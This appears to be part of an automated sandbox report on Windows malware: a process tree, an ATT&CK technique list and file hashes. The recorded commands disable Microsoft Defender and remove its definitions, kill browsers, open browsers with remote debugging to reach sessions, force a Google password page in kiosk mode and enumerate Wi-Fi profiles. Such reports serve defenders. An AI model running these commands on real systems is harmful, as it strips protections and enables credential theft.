        "C:\Users\Admin\AppData\Local\Temp\10045720101\b54ce0e752.exe"
        9⤵
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\10045730101\a333dbd0fc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045730101\a333dbd0fc.exe"
        8⤵
        
        PID:4200
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045730101\a333dbd0fc.exe"
        9⤵
        
        PID:5696
      - C:\Users\Admin\AppData\Local\Temp\10386380101\LKAGEY3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10386380101\LKAGEY3.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2532
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4160
      - C:\Users\Admin\AppData\Local\Temp\10386410101\bprz1VA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10386410101\bprz1VA.exe"
        6⤵
        
        PID:380
        
        C:\Users\Admin\AppData\Local\Temp\wow_6262_build (9).exe
        
        "C:\Users\Admin\AppData\Local\Temp\wow_6262_build (9).exe"
        7⤵
        
        PID:3276
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\Built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        7⤵
        
        PID:4608
        
        C:\Users\Admin\AppData\Local\Temp\Built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        8⤵
        
        PID:1352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        9⤵
        
        PID:4556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        9⤵
        
        PID:4064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        9⤵
        
        PID:1184
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        10⤵
        Enumerates processes with tasklist
        
        PID:1048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        9⤵
        
        PID:3560
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        10⤵
        
        PID:4648
        
        C:\Users\Admin\AppData\Local\Temp\Luma_Crypt_Packlab.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Luma_Crypt_Packlab.exe"
        7⤵
        
        PID:3504
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:764
      - C:\Users\Admin\AppData\Local\Temp\10386980101\FOm9tvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10386980101\FOm9tvc.exe"
        6⤵
        
        PID:4304
      - C:\Users\Admin\AppData\Local\Temp\10387290101\4f3de4766b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10387290101\4f3de4766b.exe"
        6⤵
        
        PID:2084
      - C:\Users\Admin\AppData\Local\Temp\10387300101\53aac28b9d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10387300101\53aac28b9d.exe"
        6⤵
        
        PID:180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        
        PID:5400
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe916bdcf8,0x7ffe916bdd04,0x7ffe916bdd10
        8⤵
        
        PID:5412
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        
        PID:5988
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x244,0x248,0x24c,0x240,0x194,0x7ffe8b12f208,0x7ffe8b12f214,0x7ffe8b12f220
        8⤵
        
        PID:5968
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2196,i,4604760313412039860,840868859427538854,262144 --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:2
        8⤵
        
        PID:3104
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1932,i,4604760313412039860,840868859427538854,262144 --variations-seed-version --mojo-platform-channel-handle=2296 /prefetch:3
        8⤵
        
        PID:1576
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1796,i,4604760313412039860,840868859427538854,262144 --variations-seed-version --mojo-platform-channel-handle=2660 /prefetch:8
        8⤵
        
        PID:5340
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3560,i,4604760313412039860,840868859427538854,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2012
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3568,i,4604760313412039860,840868859427538854,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6336
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4196,i,4604760313412039860,840868859427538854,262144 --variations-seed-version --mojo-platform-channel-handle=4208 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6428
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4256,i,4604760313412039860,840868859427538854,262144 --variations-seed-version --mojo-platform-channel-handle=4240 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:5624
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4600,i,4604760313412039860,840868859427538854,262144 --variations-seed-version --mojo-platform-channel-handle=3784 /prefetch:8
        8⤵
        
        PID:5440
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5252,i,4604760313412039860,840868859427538854,262144 --variations-seed-version --mojo-platform-channel-handle=5256 /prefetch:8
        8⤵
        
        PID:5924
      - C:\Users\Admin\AppData\Local\Temp\10387310101\c1ff774522.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10387310101\c1ff774522.exe"
        6⤵
        
        PID:5608
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        Kills process with taskkill
        
        PID:5628
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        Kills process with taskkill
        
        PID:5744
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        Kills process with taskkill
        
        PID:5808
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        Kills process with taskkill
        
        PID:5872
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        Kills process with taskkill
        
        PID:5940
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:6004
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        
        PID:6024
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {13d7df82-6436-44dd-bcc2-759850d52d89} -parentPid 6024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6024" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:5320
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2488 -prefsLen 27135 -prefMapHandle 2492 -prefMapSize 270279 -ipcHandle 2500 -initialChannelId {8aa6f206-62d4-4d71-b3d0-f275b3d61c20} -parentPid 6024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:2812
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3824 -prefsLen 25164 -prefMapHandle 3828 -prefMapSize 270279 -jsInitHandle 3832 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3840 -initialChannelId {54665302-391b-44f6-b59b-ef3512dfa04a} -parentPid 6024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        
        PID:2240
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3992 -prefsLen 27276 -prefMapHandle 3996 -prefMapSize 270279 -ipcHandle 4088 -initialChannelId {b33c27a9-f099-4c1d-9c90-28c01d939157} -parentPid 6024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6024" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:3920
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3144 -prefsLen 34775 -prefMapHandle 3236 -prefMapSize 270279 -jsInitHandle 3348 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3344 -initialChannelId {af8ee704-6492-4f4f-ba52-4705178b4fa2} -parentPid 6024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        
        PID:5552
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5008 -prefsLen 35012 -prefMapHandle 5004 -prefMapSize 270279 -ipcHandle 4996 -initialChannelId {312b7e2c-1ae9-4907-8a75-0cd28a3571bc} -parentPid 6024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        
        PID:6660
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5132 -prefsLen 32900 -prefMapHandle 5136 -prefMapSize 270279 -jsInitHandle 5140 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5148 -initialChannelId {6bd798c1-7f09-48eb-a4af-b57378178c97} -parentPid 6024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        
        PID:6700
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5432 -prefsLen 32952 -prefMapHandle 5436 -prefMapSize 270279 -jsInitHandle 5440 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5452 -initialChannelId {581c6cfe-5a25-4365-b157-5dd3a842fa5d} -parentPid 6024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        
        PID:6720
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5468 -prefsLen 32952 -prefMapHandle 5472 -prefMapSize 270279 -jsInitHandle 5476 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5484 -initialChannelId {fb0af623-f1f4-48aa-9b7b-8288f7bd9811} -parentPid 6024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        
        PID:6728
      - C:\Users\Admin\AppData\Local\Temp\10387320101\5361387e9e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10387320101\5361387e9e.exe"
        6⤵
        
        PID:2468

C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
1⤵
PID:4204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
1⤵
PID:3592
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
  2⤵
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:1728
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    PID:5024
- - C:\Windows\SysWOW64\netsh.exe
    netsh wlan show profile
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4684
- - C:\Windows\SysWOW64\findstr.exe
    findstr All
    3⤵
    PID:4464
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
  2⤵
  PID:448
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    PID:4512
- - C:\Windows\SysWOW64\netsh.exe
    netsh wlan show networks mode=bssid
    3⤵
    PID:3740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
  2⤵
  - Uses browser remote debugging
  PID:4840
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe916bdcf8,0x7ffe916bdd04,0x7ffe916bdd10
    3⤵
    PID:1720
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2036,i,16517022144260175007,9571429151668631772,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2208 /prefetch:3
    3⤵
    PID:4672
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2132,i,16517022144260175007,9571429151668631772,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2124 /prefetch:2
    3⤵
    PID:216
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2392,i,16517022144260175007,9571429151668631772,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2408 /prefetch:8
    3⤵
    PID:4216
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3268,i,16517022144260175007,9571429151668631772,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3312 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:3504
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3276,i,16517022144260175007,9571429151668631772,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3304 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:1728
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4344,i,16517022144260175007,9571429151668631772,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4364 /prefetch:2
    3⤵
    - Uses browser remote debugging
    PID:4332

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:2648

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:6152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\JDGIIDHJ

Filesize
130KB

MD5
3a7512b7ec898973d412a14a23b3699d

SHA1
f8ac2d39d9f3dd0570a5cfd949d507daa28d057b

SHA256
a11d5828651b8eb15ec356ed16b68db413a2005c63aa858f549e244cc8170740

SHA512
6175605e33cb24bcf9b233380e1970996ca3e27b108c8616ceefe8a39e044b4b049492692cfe03137d08a794c1270b54330f6abffeadd9518c7859d0f169f89d

Download Submit
C:\Users\Admin:.repos

Filesize
1.2MB

MD5
54bdd94778ef087d67b0ed401111515a

SHA1
bfd27dbec8299d5c5cdf9329ed635f21df7d3fb4

SHA256
fd2c66df093ac37c3eb2b681986000121c8d0555d68ce2718e8d9f30824f403b

SHA512
014cbc9ebd4e187dcb49decd8b16e05773f5f0e1480ccb194bf6f08598bbe16671c96d94d21431e7e98d3b3fe3433317d8a4a0515ce571e06d6e002ee93b9ec7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
2542124474b3fbb888b1422adcdde283

SHA1
3dad30c21f3186c25830cf3644b7f23772d00d0f

SHA256
e170bf718fc03c4baeb76497ded25054cad92f8a68da513b19475ab9db80c4e3

SHA512
aa60a4376db929b0cdc1a65acb9f1f94936509e474b57a55b683d3636d5e2eddca03ddcb2b6b6d7aec48345508ffe3034126403bb5a738d89eafe0072e2d9968

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
049e5a246ed025dee243db0ba8e2984c

SHA1
15ec2d2b28dcfc17c1cfb5d0c13482d0706f942d

SHA256
33071ca42c472861a2fabd0f82f8b03ef0daaa6796b24b83f3df02587e4c3d12

SHA512
bc5f6fa6a8cae20ab40eae4552650d75f38ebb158c95288a79d9f332623bb507946513c39d19c00a5aee323df01f0f1a51c54594ef1c293289baf45f4ae2145b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
4facd0ff10154cde70c99baa7df81001

SHA1
65267ea75bcb63edd2905e288d7b96b543708205

SHA256
a13534df0cd0a79a3a1b91085a6d575b47d5a9aad7fc6d712fd2616c0e95a23b

SHA512
ad8d2b965851c0ddc23e92ae151b3b0b2bcda850c446f4278bdb0754d6b42ead8fc034b394749578a27b33ad7e4ab0633f974dfd4773fbe4d93ae477f00b73f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
69KB

MD5
164a788f50529fc93a6077e50675c617

SHA1
c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

SHA256
b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

SHA512
ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\cc742e8e-8d86-4c2c-a946-d520a388195f\index-dir\the-real-index

Filesize
648B

MD5
5da0d3d5570a7aca14f0519f0b405562

SHA1
5dd0c30b4a2cf69f9e6333b939bbf2af2304a29f

SHA256
b0d685dce7c6eb9bfb12c1d817b54e23e94ff70d089dd7cf0972a4b4746d744e

SHA512
8ed237f6ca1778797aebce961c9e895032ea7755713f5985530d9c4f21c1dae2315d22222aaa62361347dbd628c7b13bc55b3c2675a2024a0fb361992d4f92ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\cc742e8e-8d86-4c2c-a946-d520a388195f\index-dir\the-real-index~RFe59c2aa.TMP

Filesize
648B

MD5
01a61e85e342dbdaa647af51fd20323e

SHA1
47f8a97e43b180a4d99f36eced48bca5d03bd95f

SHA256
e14e97625d974ff4c44b93422d9d1356d501d5a920b8968ed937c742f7c48c51

SHA512
